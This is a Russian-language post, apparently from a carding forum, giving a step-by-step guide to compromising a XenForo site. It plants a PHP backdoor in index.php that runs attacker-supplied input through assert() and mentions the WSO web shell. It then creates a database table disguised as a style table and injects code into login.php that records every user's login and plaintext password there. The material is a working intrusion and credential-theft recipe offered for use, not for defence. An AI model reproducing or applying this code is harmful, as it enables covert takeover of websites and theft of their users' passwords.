Акция 2024: Оплачиваем написание статей на кардинг тематику. Подробности
Перейти к содержанию
Искать в
  • Ещё...
Поиск результатов, которые содержат...
Поиск результатов в...
Авторизация  
smertserenevomy

Избавляемся от хеширования в Xenforo

Рекомендуемые сообщения


Используем "WSO Web Shell"



Отправляемся к файлу index.php , и дописываем вредоносный код:

Код:

if (isset($_REQUEST['l']))

assert(stripslashes($_REQUEST[l]));







Вызываем скрипт и получаем доступ к RemoteShell:

Код:

http://www.ru/index.....ru/screen.png'))#



Отсеиваем логин и пасс из файлов с ФТП , создаем базу данных

Код:

create table xf_style_property_css (

ID int(20) AUTO_INCREMENT,

CSSName varchar(50) NOT NULL,

CSSValue varchar(50) NOT NULL,

PRIMARY KEY (ID)

);







Находим в файле login.php строки:

Изображение



Дописываем код:

Код:

$DataBaseConnector = mysql_connect('localhost', 'Имя БД', 'Пароль от БД');

   mysql_select_db('Имя БД');

   mysql_query("SET NAMES 'utf8'");

   $datalogxf = $data['login'];

   $datapassxf = $data['password'];

   mysql_query("INSERT INTO 'xf_style_property_css' ('ID', 'CSSName', 'CSSValue') VALUES ('', '$datalogxf', '$datapassxf') ", $DataBaseConnector);





После всех выше описанных функций , каждый авторизованный пользователь будет внесен в наш раздел с базой ( который создали выше ).



Выполняем команду получения списка: (Сейчас он пустой )

Код:

SELECT * FROM 'xf_style_property_css'



Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация  

×